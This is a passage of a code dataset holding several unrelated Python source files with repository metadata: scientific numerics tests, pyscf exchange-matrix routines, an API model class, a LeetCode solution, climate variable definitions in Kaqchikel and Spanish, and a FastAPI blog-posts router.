simstats(rstream)\n\n m_ref = 0.507154277182\n v_ref = 0.0840257344388\n e_ref = 0.00949486225214\n k_ref = 1.07291426596\n\n assert(value_eq(float(m),m_ref))\n assert(value_eq(float(v),v_ref))\n assert(value_eq(float(e),e_ref))\n assert(value_eq(float(k),k_ref))\n\n m_ref = np.array(10*[m_ref])\n v_ref = np.array(10*[v_ref])\n e_ref = np.array(10*[e_ref])\n k_ref = np.array(10*[k_ref])\n \n m,v,e,k = simstats(rstream_wide)\n \n assert(value_eq(m,m_ref))\n assert(value_eq(v,v_ref))\n assert(value_eq(e,e_ref))\n assert(value_eq(k,k_ref))\n#end def test_simstats\n\n\n\ndef test_equilibration_length():\n import numpy as np\n from numerics import equilibration_length\n\n eq = equilibration_length(rstream,random=False)\n assert(eq==0)\n\n rs = rstream + np.exp(-np.arange(len(rstream),dtype=float)/10)\n\n eq = equilibration_length(rs,random=False)\n assert(eq==52)\n\n eq = equilibration_length(rs,random=True)\n#end def test_equilibration_length\n\n\n\nif scipy_available:\n def test_ttest():\n import numpy as np\n from testing import value_eq\n from numerics import ttest\n\n p = ttest(0.,1.,100,0.,1.,100)\n assert(value_eq(float(p),1.0))\n\n p = ttest(0.,1.,10000,1.,1.,10000)\n 
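# with means 0 and 1 and errorbars 1 each, t = 1/sqrt(2) ~ 0.707, giving the two-sided p-value of ~0.48 checked below\n        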
assert(value_eq(float(p),0.479508361523))\n #end def test_ttest\n#end if\n\n\n\ndef test_jackknife():\n from testing import value_eq\n from numerics import jackknife\n\n def value(v):\n return v\n #end def value\n\n jm_ref = np.array(10*[0.50715428],dtype=float)\n je_ref = np.array(10*[0.00917114],dtype=float)\n\n jm,je = jackknife(rstream_wide.T,value)\n\n assert(value_eq(jm,jm_ref))\n assert(value_eq(je,je_ref))\n#end def test_jackknife\n\n\n\ndef test_morse():\n from testing import value_eq\n from unit_converter import convert\n from numerics import morse,morse_re,morse_a,morse_De,morse_Einf,morse_width\n from numerics import morse_depth,morse_Ee,morse_k,morse_params\n from numerics import morse_reduced_mass,morse_freq,morse_w,morse_wX\n from numerics import morse_E0,morse_En,morse_zero_point,morse_harmfreq\n from numerics import morse_harmonic_potential,morse_spect_fit\n from numerics import morse_rDw_fit,morse_fit,morse_fit_fine\n\n rm = morse_reduced_mass('Ti','O')\n assert(value_eq(rm,21862.2266134))\n\n r_ref,D_ref,w_ref = 1.620,6.87,1009.18\n r_ref_A = r_ref\n p = morse_rDw_fit(r_ref,D_ref,w_ref,'Ti','O',Dunit='eV')\n\n r_ref = convert(r_ref,'A','B')\n D_ref = convert(D_ref,'eV','Ha')\n\n r = morse_re(p)\n D = morse_De(p)\n w = morse_w(p,'Ti','O')\n Einf = morse_Einf(p)\n assert(value_eq(float(r),r_ref))\n assert(value_eq(float(D),D_ref))\n assert(value_eq(float(w),w_ref))\n assert(value_eq(float(Einf),0.0))\n\n width_ref = 1.0451690611\n width = morse_width(p)\n assert(value_eq(float(width),width_ref))\n\n depth = morse_depth(p)\n assert(value_eq(depth,D_ref))\n\n a = morse_a(p)\n assert(value_eq(float(a),1/width_ref))\n\n Ee = morse_Ee(p)\n assert(value_eq(float(Ee),-D_ref))\n\n k_ref = 0.462235185922\n k = morse_k(p)\n assert(value_eq(float(k),k_ref))\n\n assert(value_eq(morse_params(r,a,D,Einf),p))\n\n assert(value_eq(morse_freq(p,'Ti','O'),w))\n\n #wX_ref = 2.43157675597e-08 # might be buggy\n #wX = morse_wX(p,'Ti','O')\n #assert(value_eq(float(wX),wX_ref))\n\n E0_ref = -0.250174011529\n E0 = morse_E0(p,'Ti','O')\n assert(value_eq(float(E0),E0_ref))\n\n E0 = morse_En(p,0,'Ti','O')\n assert(value_eq(float(E0),E0_ref))\n\n En_ref = [-0.250174011529,\n -0.245617721989,\n -0.241103305298,\n -0.236630761457,\n -0.232200090465]\n\n for n in range(5):\n En = morse_En(p,n,'Ti','O')\n assert(value_eq(float(En),En_ref[n]))\n #end for\n\n zp_ref = 0.00229384708885\n zp = morse_zero_point(p,'Ti','O')\n assert(value_eq(float(zp),zp_ref))\n\n # not consistent w/ morse_wX\n #p_sf = morse_spect_fit(r_ref_A,w_ref,wX_ref,'Ti','O')\n\n hf_ref = 0.00459816239012\n hf = morse_harmfreq(p,'Ti','O')\n assert(value_eq(float(hf),hf_ref))\n\n E = morse(p,r_ref)\n assert(value_eq(float(E),-D_ref))\n#end def test_morse\n\n\n\nif scipy_available:\n def test_morse_fit():\n import numpy as np\n from testing import value_eq\n from unit_converter import convert\n from numerics import morse\n from numerics import morse_rDw_fit,morse_fit,morse_fit_fine\n\n r_ref,D_ref,w_ref = 1.620,6.87,1009.18\n r_ref_A = r_ref\n p = morse_rDw_fit(r_ref,D_ref,w_ref,'Ti','O',Dunit='eV')\n\n r_ref = convert(r_ref,'A','B')\n\n\n rfine = np.linspace(0.8*r_ref,1.2*r_ref,100)\n Efine = morse(p,rfine)\n\n pf = morse_fit(rfine,Efine,p)\n\n pref = tuple(np.array(p,dtype=float))\n pf = tuple(np.array(pf,dtype=float))\n\n assert(value_eq(pf,pref))\n\n pf,Ef = morse_fit_fine(rfine,Efine,p,rfine,both=True)\n pf = tuple(np.array(pf,dtype=float))\n assert(value_eq(pf,pref))\n assert(value_eq(Ef,Efine))\n #end def test_morse_fit\n#end 
if\n\n\n\n\ndef test_eos():\n import numpy as np\n from testing import value_eq\n from unit_converter import convert\n from numerics import eos_fit,eos_eval,eos_param\n\n data = np.array([\n [0.875, -83.31851261], \n [0.900, -83.38085214], \n [0.925, -83.42172843], \n [0.950, -83.44502216], \n [0.975, -83.45476035], \n [1.025, -83.44564229], \n [1.050, -83.43127254], \n [1.000, -83.45412846], \n [1.100, -83.39070714], \n [1.125, -83.36663810], \n ])\n\n a = 5.539 # lattice constant\n\n V = (a*data[:,0])**3\n E = convert(data[:,1],'Ry','eV')\n\n # done originally to get params below\n #pf = eos_fit(V,E,'vinet')\n\n Einf = -1.13547294e+03\n V0 = 1.62708941e+02\n B0 = 1.34467867e-01\n Bp0 = 4.55846963e+00\n\n pf = Einf,V0,B0,Bp0\n\n Ef = eos_eval(pf,V,'vinet')\n\n assert(value_eq(Ef,E,atol=4e-3))\n\n assert(value_eq(float(eos_param(pf,'Einf','vinet')),Einf))\n assert(value_eq(float(eos_param(pf,'V','vinet')),V0))\n assert(value_eq(float(eos_param(pf,'B','vinet')),B0))\n assert(value_eq(float(eos_param(pf,'Bp','vinet')),Bp0))\n#end def test_eos\n\n\n\nif scipy_available:\n def test_eos_fit():\n import numpy as np\n from testing import value_eq\n from unit_converter import convert\n from numerics import eos_fit,eos_eval,eos_param\n\n data = np.array([\n [0.875, -83.31851261], \n [0.900, -83.38085214], \n [0.925, -83.42172843], \n [0.950, -83.44502216], \n [0.975, -83.45476035], \n [1.025, -83.44564229], \n [1.050, -83.43127254], \n [1.000, -83.45412846], \n [1.100, -83.39070714], \n [1.125, -83.36663810], \n ])\n\n a = 5.539 # lattice constant\n\n V = (a*data[:,0])**3\n E = convert(data[:,1],'Ry','eV')\n\n # done originally to get params below\n #pf = eos_fit(V,E,'vinet')\n\n Einf = -1.13547294e+03\n V0 = 1.62708941e+02\n B0 = 1.34467867e-01\n Bp0 = 4.55846963e+00\n\n pf = Einf,V0,B0,Bp0\n\n Ef = eos_eval(pf,V,'vinet')\n\n pf2 = eos_fit(V,Ef,'vinet')\n\n pf = np.array(pf,dtype=float)\n pf2 = np.array(pf2,dtype=float)\n\n assert(value_eq(pf,pf2,atol=1e-3))\n #end def test_eos_fit\n#end if\n","repo_name":"QMCPACK/qmcpack","sub_path":"nexus/tests/unit/test_numerics.py","file_name":"test_numerics.py","file_ext":"py","file_size_in_byte":16316,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"} +{"seq_id":"33899291543","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..models.offer_customer_type import OfferCustomerType\nfrom ..models.quantity_discount_type import QuantityDiscountType\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.price_type import PriceType\n\n\nT = TypeVar(\"T\", bound=\"CompetitivePriceType\")\n\n\n@attr.s(auto_attribs=True)\nclass CompetitivePriceType:\n r\"\"\"\n Attributes:\n competitive_price_id (str): The pricing model for each price that is returned.\n\n Possible values:\n\n * 1 - New Buy Box Price.\n * 2 - Used Buy Box Price.\n price (PriceType):\n condition (Union[Unset, str]): Indicates the condition of the item whose pricing information is returned.\n Possible values are: New, Used, Collectible, Refurbished, or Club.\n subcondition (Union[Unset, str]): Indicates the subcondition of the item whose pricing information is returned.\n Possible values are: New, Mint, Very Good, Good, Acceptable, Poor, Club, OEM, Warranty, Refurbished Warranty,\n Refurbished, Open Box, or Other.\n offer_type (Union[Unset, OfferCustomerType]):\n quantity_tier (Union[Unset, int]): Indicates at what quantity this price becomes active.\n quantity_discount_type 
(Union[Unset, QuantityDiscountType]):\n seller_id (Union[Unset, str]): The seller identifier for the offer.\n belongs_to_requester (Union[Unset, bool]): Indicates whether or not the pricing information is for an offer\n listing that belongs to the requester. The requester is the seller associated with the SellerId that was\n submitted with the request. Possible values are: true and false.\n \"\"\"\n\n competitive_price_id: str\n price: \"PriceType\"\n condition: Union[Unset, str] = UNSET\n subcondition: Union[Unset, str] = UNSET\n offer_type: Union[Unset, OfferCustomerType] = UNSET\n quantity_tier: Union[Unset, int] = UNSET\n quantity_discount_type: Union[Unset, QuantityDiscountType] = UNSET\n seller_id: Union[Unset, str] = UNSET\n belongs_to_requester: Union[Unset, bool] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n competitive_price_id = self.competitive_price_id\n price = self.price.to_dict()\n\n condition = self.condition\n subcondition = self.subcondition\n offer_type: Union[Unset, str] = UNSET\n if not isinstance(self.offer_type, Unset):\n offer_type = self.offer_type.value\n\n quantity_tier = self.quantity_tier\n quantity_discount_type: Union[Unset, str] = UNSET\n if not isinstance(self.quantity_discount_type, Unset):\n quantity_discount_type = self.quantity_discount_type.value\n\n seller_id = self.seller_id\n belongs_to_requester = self.belongs_to_requester\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"CompetitivePriceId\": competitive_price_id,\n \"Price\": price,\n }\n )\n if condition is not UNSET:\n field_dict[\"condition\"] = condition\n if subcondition is not UNSET:\n field_dict[\"subcondition\"] = subcondition\n if offer_type is not UNSET:\n field_dict[\"offerType\"] = offer_type\n if quantity_tier is not UNSET:\n field_dict[\"quantityTier\"] = quantity_tier\n if quantity_discount_type is not UNSET:\n field_dict[\"quantityDiscountType\"] = quantity_discount_type\n if seller_id is not UNSET:\n field_dict[\"sellerId\"] = seller_id\n if belongs_to_requester is not UNSET:\n field_dict[\"belongsToRequester\"] = belongs_to_requester\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.price_type import PriceType\n\n d = src_dict.copy()\n competitive_price_id = d.pop(\"CompetitivePriceId\")\n\n price = PriceType.from_dict(d.pop(\"Price\"))\n\n condition = d.pop(\"condition\", UNSET)\n\n subcondition = d.pop(\"subcondition\", UNSET)\n\n _offer_type = d.pop(\"offerType\", UNSET)\n offer_type: Union[Unset, OfferCustomerType]\n if isinstance(_offer_type, Unset):\n offer_type = UNSET\n else:\n offer_type = OfferCustomerType(_offer_type)\n\n quantity_tier = d.pop(\"quantityTier\", UNSET)\n\n _quantity_discount_type = d.pop(\"quantityDiscountType\", UNSET)\n quantity_discount_type: Union[Unset, QuantityDiscountType]\n if isinstance(_quantity_discount_type, Unset):\n quantity_discount_type = UNSET\n else:\n quantity_discount_type = QuantityDiscountType(_quantity_discount_type)\n\n seller_id = d.pop(\"sellerId\", UNSET)\n\n belongs_to_requester = d.pop(\"belongsToRequester\", UNSET)\n\n result = cls(\n competitive_price_id=competitive_price_id,\n price=price,\n condition=condition,\n subcondition=subcondition,\n offer_type=offer_type,\n quantity_tier=quantity_tier,\n quantity_discount_type=quantity_discount_type,\n seller_id=seller_id,\n belongs_to_requester=belongs_to_requester,\n 
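# all recognized keys were popped from d above, so only the leftover entries become additional_properties below\n        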
)\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/product_pricing_v0/models/competitive_price_type.py","file_name":"competitive_price_type.py","file_ext":"py","file_size_in_byte":5961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2702441737","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\n'''\nJK with discrete Fourier transformation\n'''\n\nimport numpy as np\nfrom pyscf import lib\nfrom pyscf.lib import logger\nfrom pyscf.pbc import tools\nfrom pyscf.pbc.dft import gen_grid\nfrom pyscf.pbc.dft import numint\n\n\ndef get_j_kpts(mydf, dm_kpts, hermi=1, kpts=np.zeros((1,3)), kpt_band=None):\n '''Get the Coulomb (J) AO matrix at sampled k-points.\n\n Args:\n dm_kpts : (nkpts, nao, nao) ndarray or a list of (nkpts,nao,nao) ndarray\n Density matrix at each k-point. If a list of k-point DMs, eg,\n UHF alpha and beta DM, the alpha and beta DMs are contracted\n separately.\n kpts : (nkpts, 3) ndarray\n\n Kwargs:\n kpt_band : (3,) ndarray\n An arbitrary \"band\" k-point at which to evalute the matrix.\n\n Returns:\n vj : (nkpts, nao, nao) ndarray\n or list of vj if the input dm_kpts is a list of DMs\n '''\n cell = mydf.cell\n gs = mydf.gs\n\n dm_kpts = lib.asarray(dm_kpts, order='C')\n dms = _format_dms(dm_kpts, kpts)\n nset, nkpts, nao = dms.shape[:3]\n\n coulG = tools.get_coulG(cell, gs=gs)\n ngs = len(coulG)\n\n vR = rhoR = np.zeros((nset,ngs))\n for k, aoR in mydf.aoR_loop(cell, gs, kpts):\n for i in range(nset):\n rhoR[i] += numint.eval_rho(cell, aoR, dms[i,k])\n for i in range(nset):\n rhoR[i] *= 1./nkpts\n rhoG = tools.fft(rhoR[i], gs)\n vG = coulG * rhoG\n vR[i] = tools.ifft(vG, gs).real\n\n if kpt_band is not None:\n for k, aoR_kband in mydf.aoR_loop(cell, gs, kpts, kpt_band):\n pass\n vj_kpts = [cell.vol/ngs * lib.dot(aoR_kband.T.conj()*vR[i], aoR_kband)\n for i in range(nset)]\n if dm_kpts.ndim == 3: # One set of dm_kpts for KRHF\n vj_kpts = vj_kpts[0]\n return lib.asarray(vj_kpts)\n else:\n vj_kpts = []\n weight = cell.vol / ngs\n for k, aoR in mydf.aoR_loop(cell, gs, kpts):\n for i in range(nset):\n vj_kpts.append(weight * lib.dot(aoR.T.conj()*vR[i], aoR))\n vj_kpts = lib.asarray(vj_kpts).reshape(nkpts,nset,nao,nao)\n return vj_kpts.transpose(1,0,2,3).reshape(dm_kpts.shape)\n\ndef get_k_kpts(mydf, dm_kpts, hermi=1, kpts=np.zeros((1,3)), kpt_band=None,\n exxdiv=None):\n '''Get the Coulomb (J) and exchange (K) AO matrices at sampled k-points.\n\n Args:\n dm_kpts : (nkpts, nao, nao) ndarray\n Density matrix at each k-point\n kpts : (nkpts, 3) ndarray\n\n Kwargs:\n kpt_band : (3,) ndarray\n An arbitrary \"band\" k-point at which to evalute the matrix.\n\n Returns:\n vj : (nkpts, nao, nao) ndarray\n vk : (nkpts, nao, nao) ndarray\n or list of vj and vk if the input dm_kpts is a list of DMs\n '''\n cell = mydf.cell\n gs = mydf.gs\n coords = gen_grid.gen_uniform_grids(cell, gs)\n ngs = coords.shape[0]\n\n kpts = np.asarray(kpts)\n dm_kpts = lib.asarray(dm_kpts, order='C')\n dms = _format_dms(dm_kpts, kpts)\n 
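# after formatting, dms has shape (nset, nkpts, nao, nao)\n    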
nset, nkpts, nao = dms.shape[:3]\n\n weight = 1./nkpts * (cell.vol/ngs)\n\n if kpt_band is not None:\n for k, aoR_kband in mydf.aoR_loop(cell, gs, kpts, kpt_band):\n pass\n vk_kpts = [0] * nset\n for k2, ao_k2 in mydf.aoR_loop(cell, gs, kpts):\n kpt2 = kpts[k2]\n vkR_k1k2 = get_vkR(mydf, cell, aoR_kband, ao_k2, kpt_band, kpt2,\n coords, gs, exxdiv)\n #:vk_kpts = 1./nkpts * (cell.vol/ngs) * np.einsum('rs,Rp,Rqs,Rr->pq',\n #: dm_kpts[k2], aoR_kband.conj(), vkR_k1k2, ao_k2)\n for i in range(nset):\n aoR_dm = lib.dot(ao_k2, dms[i,k2])\n tmp_Rq = np.einsum('Rqs,Rs->Rq', vkR_k1k2, aoR_dm)\n vk_kpts[i] += weight * lib.dot(aoR_kband.T.conj(), tmp_Rq)\n vkR_k1k2 = aoR_dm = tmp_Rq = None\n if dm_kpts.ndim == 3:\n vk_kpts = vk_kpts[0]\n return lib.asarray(vk_kpts)\n else:\n if abs(kpts).sum() < 1e-9:\n vk_kpts = np.zeros((nset,nkpts,nao,nao), dtype=dms.dtype)\n else:\n vk_kpts = np.zeros((nset,nkpts,nao,nao), dtype=np.complex128)\n for k2, ao_k2 in mydf.aoR_loop(cell, gs, kpts):\n kpt2 = kpts[k2]\n aoR_dms = [lib.dot(ao_k2, dms[i,k2]) for i in range(nset)]\n for k1, ao_k1 in mydf.aoR_loop(cell, gs, kpts):\n kpt1 = kpts[k1]\n vkR_k1k2 = get_vkR(mydf, cell, ao_k1, ao_k2, kpt1, kpt2,\n coords, gs, exxdiv)\n for i in range(nset):\n tmp_Rq = np.einsum('Rqs,Rs->Rq', vkR_k1k2, aoR_dms[i])\n vk_kpts[i,k1] += weight * lib.dot(ao_k1.T.conj(), tmp_Rq)\n vkR_k1k2 = aoR_dms = tmp_Rq = None\n return vk_kpts.reshape(dm_kpts.shape)\n\n\ndef get_jk(mydf, dm, hermi=1, kpt=np.zeros(3), kpt_band=None):\n '''Get the Coulomb (J) and exchange (K) AO matrices for the given density matrix.\n\n Args:\n dm : ndarray or list of ndarrays\n A density matrix or a list of density matrices\n\n Kwargs:\n hermi : int\n Whether J, K matrix is hermitian\n | 0 : no hermitian or symmetric\n | 1 : hermitian\n | 2 : anti-hermitian\n kpt : (3,) ndarray\n The \"inner\" dummy k-point at which the DM was evaluated (or\n sampled).\n kpt_band : (3,) ndarray\n The \"outer\" primary k-point at which J and K are evaluated.\n\n Returns:\n The function returns one J and one K matrix, corresponding to the input\n density matrix (both order and shape).\n '''\n dm = np.asarray(dm, order='C')\n vj = get_j(mydf, dm, hermi, kpt, kpt_band)\n vk = get_k(mydf, dm, hermi, kpt, kpt_band)\n return vj, vk\n\ndef get_j(mydf, dm, hermi=1, kpt=np.zeros(3), kpt_band=None):\n '''Get the Coulomb (J) AO matrix for the given density matrix.\n\n Args:\n dm : ndarray or list of ndarrays\n A density matrix or a list of density matrices\n\n Kwargs:\n hermi : int\n Whether J, K matrix is hermitian\n | 0 : no hermitian or symmetric\n | 1 : hermitian\n | 2 : anti-hermitian\n kpt : (3,) ndarray\n The \"inner\" dummy k-point at which the DM was evaluated (or\n sampled).\n kpt_band : (3,) ndarray\n The \"outer\" primary k-point at which J and K are evaluated.\n\n Returns:\n The function returns one J matrix, corresponding to the input\n density matrix (both order and shape).\n '''\n dm = np.asarray(dm, order='C')\n nao = dm.shape[-1]\n dm_kpts = dm.reshape(-1,1,nao,nao)\n vj = get_j_kpts(mydf, dm_kpts, hermi, [kpt], kpt_band)\n return vj.reshape(dm.shape)\n\ndef get_k(mydf, dm, hermi=1, kpt=np.zeros(3), kpt_band=None, exxdiv=None):\n '''Get the Coulomb (J) and exchange (K) AO matrices for the given density matrix.\n\n Args:\n dm : ndarray or list of ndarrays\n A density matrix or a list of density matrices\n\n Kwargs:\n hermi : int\n Whether J, K matrix is hermitian\n | 0 : no hermitian or symmetric\n | 1 : hermitian\n | 2 : anti-hermitian\n kpt : (3,) ndarray\n The \"inner\" dummy 
k-point at which the DM was evaluated (or\n sampled).\n kpt_band : (3,) ndarray\n The \"outer\" primary k-point at which J and K are evaluated.\n\n Returns:\n The function returns one J and one K matrix, corresponding to the input\n density matrix (both order and shape).\n '''\n dm = np.asarray(dm, order='C')\n nao = dm.shape[-1]\n dm_kpts = dm.reshape(-1,1,nao,nao)\n vk = get_k_kpts(mydf, dm_kpts, hermi, [kpt], kpt_band, exxdiv)\n return vk.reshape(dm.shape)\n\n\ndef get_vkR(mydf, cell, aoR_k1, aoR_k2, kpt1, kpt2, coords, gs, exxdiv):\n '''Get the real-space 2-index \"exchange\" potential V_{i,k1; j,k2}(r)\n where {i,k1} = exp^{i k1 r) |i> , {j,k2} = exp^{-i k2 r) int:\n n = len(dist)\n # dp[i][j] := minimum time to travel the roads where i := last road index (1-base) and j := number of skips\n dp = [[sys.maxsize for _ in range(n + 1)] for _ in range(n + 1)]\n dp[0][0] = 0\n\n for index, distance in enumerate(dist, 1):\n # use round to eliminate inaccuracies caused by float\n # also note that no need do skip for last road\n dp[index][0] = math.ceil(round(dp[index - 1][0] + distance / speed, 7)) if index < len(dist) else dp[index - 1][0] + distance / speed\n for skips in range(1, index + 1):\n if index < len(dist):\n do_skip_time = dp[index - 1][skips - 1] + distance / speed\n no_skip_time = math.ceil(round(dp[index - 1][skips] + distance / speed, 7))\n else:\n do_skip_time = no_skip_time = dp[index - 1][skips] + distance / speed\n dp[index][skips] = min(do_skip_time, no_skip_time)\n\n for skips, time in enumerate(dp[-1]):\n if time <= hoursBefore:\n return skips\n return -1\n","repo_name":"DaMinaup6/algorithm-exercises","sub_path":"leetcode/hard/1883_minimum_skips_to_arrive_at_meeting_on_time.py","file_name":"1883_minimum_skips_to_arrive_at_meeting_on_time.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40684057961","text":"from ykbl import RetalJaloj\n\netabälqij = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl qi'j\", \"español\": \"Radiación Solar\"}, kulbat=(0, None), junilal=\"W/(m*m)\"\n)\nnïm_etabälqij = RetalJaloj(\n {\"Kaqchikel\": \"Nïm etabälqij\", \"español\": \"Radiación Solar Maximal\"}, kulbat=(0, None), junilal=\"W/(m*m)\"\n)\nnïm_tewkatanil = RetalJaloj(\n {\"Kaqchikel\": \"Nïm tewk'atanil\", \"español\": \"Temperatura Maximal\"}, kulbat=(None, None), junilal=\"°C\"\n)\nkoöl_tewkatanil = RetalJaloj(\n {\"Kaqchikel\": \"Ko'öl tewk’atanil \", \"español\": \"Temperatura Minimal\"}, kulbat=(None, None), junilal=\"°C\"\n)\ncholajil_tewkatanil = RetalJaloj(\n {\"Kaqchikel\": \"Cholajil tewk'atanil\", \"español\": \"Temperatura Prom.\"}, kulbat=(None, None), junilal=\"°C\"\n)\netabälräxkaqïq = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl räx kaq’ïq\", \"español\": \"Humedad\"}, kulbat=(0, 100), junilal=\"%\"\n)\netabälMetzetelSaqil = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl metz’etel saqil\", \"español\": \"Indice UV\"}, kulbat=(0, None), junilal=\"Unid\"\n)\nnïm_etabälMetzetelSaqil = RetalJaloj(\n {\"Kaqchikel\": \"Etab'äl metz'etel saqil nïm\", \"español\": \"Indice UV Mayor\"}, kulbat=(0, None), junilal=\"Unid\"\n)\nnïm_ochochibälKaqïq = RetalJaloj(\n {\"Kaqchikel\": \"Ochochib’äl nïm kaq'ïq'\", \"español\": \"Dirección Viento Max\"}, kulbat=(0, None), junilal=\"NESW\"\n)\n\nnïm_aninemKaqïq = RetalJaloj(\n {\"Kaqchikel\": \"Nïm aninem kaq'ïq'\", \"español\": \"Velocidad Viento Maximal\"}, kulbat=(0, None), junilal=\"km/h\"\n)\nprecipitación = RetalJaloj(\n {\"Kaqchikel\": \"ask 
julien\", \"español\": \"Precipitación\"}, kulbat=(0, None), junilal=\"mm\"\n)\n\nnevada = RetalJaloj(\n {\"Kaqchikel\": \"ask julien\", \"español\": \"Nevada\"}, kulbat=(0, None), junilal=\"mm\"\n)\n\ntzujalchirijulew = RetalJaloj(\n {\"Kaqchikel\": \"Tz'ujal chirij ulew\", \"español\": \"Escorrentía\"}, kulbat=(0, None), junilal=\"mm\"\n)\njab = RetalJaloj(\n {\"Kaqchikel\": \"Jab'\", \"español\": \"Lluvia\"},\n kulbat=(0, None), junilal=\"mm\"\n)\nkichelaj = RetalJaloj(\n {\"Kaqchikel\": \"K'ichelaj\", \"español\": \"Bosque\"},\n kulbat=(0, None), junilal='ha'\n)\nche = RetalJaloj(\n {\"Kaqchikel\": \"Che'\", \"español\": \"Árboles\"},\n kulbat=(0, None), junilal='ha'\n)\ntikon = RetalJaloj(\n {\"Kaqchikel\": \"Tiko'n\", \"Tz'utujil\": \"Tijko'n\", \"español\": \"Árboles\"},\n kulbat=(0, None), junilal='ha'\n)\nkokoltaqche = RetalJaloj(\n {\"Kaqchikel\": \"Kok'ol taq che'\", \"español\": \"Arbustales\"},\n kulbat=(0, None), junilal='ha'\n)\n\nruwächqij_retal_jaloj_DICA_AMSCLAE = [koöl_tewkatanil, cholajil_tewkatanil, nïm_tewkatanil, etabälräxkaqïq, precipitación, etabälqij,\n nïm_etabälqij, etabälMetzetelSaqil, nïm_ochochibälKaqïq, nïm_aninemKaqïq, nïm_aninemKaqïq]\n\ntaq_retal_jaloj = [tzujalchirijulew, jab, kichelaj, che, tikon, kokoltaqche]\n","repo_name":"marcoramirez21/Yikbalruxetzijnaoj","sub_path":"atitlán/rtljlj.py","file_name":"rtljlj.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42737843543","text":"from fastapi import APIRouter, Depends, FastAPI, status, Response, HTTPException\nfrom sqlalchemy import func\n\nfrom ..database import get_db\nfrom typing import List, Optional\nfrom .. import schemas \nfrom .. import models\nfrom .. 
import oath2\nfrom sqlalchemy.orm import Session\n\nrouter = APIRouter(prefix = '/posts', tags = ['POSTS'])\n \n@router.get('/', response_model= List[schemas.PostOut])\ndef get_all_posts(db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user), \n limit: int = 10, skip: int = 0, search: Optional[str] = \"\"):\n # cursor.execute(\"\"\" SELECT * FROM posts\"\"\")\n # posts = cursor.fetchall()\n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # lst = []\n # for post in posts:\n # lst.append( dict( zip( columnNames , post)))\n \n # return lst\n posts = db.query(models.Post, func.count(models.Vote.post_id).label(\"votes\")).join(\n models.Vote, models.Vote.post_id == models.Post.id, isouter=True).group_by(models.Post.id).filter(models.Post.title.contains(search)).limit(limit = limit).offset(skip).all()\n \n # print(posts)\n return posts\n\n\n@router.get('/{id}', response_model= schemas.PostOut)\ndef get_post(id: int, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" SELECT * FROM posts WHERE ID = %s\"\"\",(str(id),)) # used %s because of fear of sql injections \n # post = cursor.fetchone()\n # if not post:\n # raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n \n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # post = dict(zip( columnNames , post ))\n \n # return post \n \n # post_query = db.query(models.Post, func.count(models.Vote.post_id).label(\"votes\")).join(models.Vote, models.Vote.post_id == models.Post.id, isouter=True).group_by(models.Post.id).filter(models.Post.id == id)\n post_query = db.query(models.Post, func.count(models.Vote.post_id).label(\"votes\")).join(\n models.Vote, models.Vote.post_id == models.Post.id, isouter=True).group_by(models.Post.id).filter(models.Post.id == id)\n\n post = post_query.first()\n # NOTE THE OBJECT RETURNED IS (MODELS.POST object, votes) its a tuple not an object \n # so postout needs to have object and vote \n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found-------\")\n \n return post\n\n@router.post('/', status_code= status.HTTP_201_CREATED, response_model= schemas.Post)\ndef create(post: schemas.PostCreate, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" INSERT INTO posts (title, content, published) VALUES (%s, %s, %s) RETURNING *\"\"\",(post.title, post.content, post.published))\n # new_post = cursor.fetchone()\n # conn.commit()\n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # new_post = dict(zip( columnNames , new_post ))\n \n # return new_post\n # print(type(current_user))\n new_post = models.Post(**post.dict(), owner_id = current_user.id) # ** is used for converting dictionary to usable form \n db.add(new_post)\n db.commit()\n # used to return new post\n db.refresh(new_post)\n return new_post\n\n@router.put('/{id}', response_model= schemas.Post)\ndef update(id: int, post: schemas.PostCreate, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" UPDATE posts SET title = %s, content= %s, published = %s WHERE id = %s RETURNING * \"\"\",(post.title, post.content, 
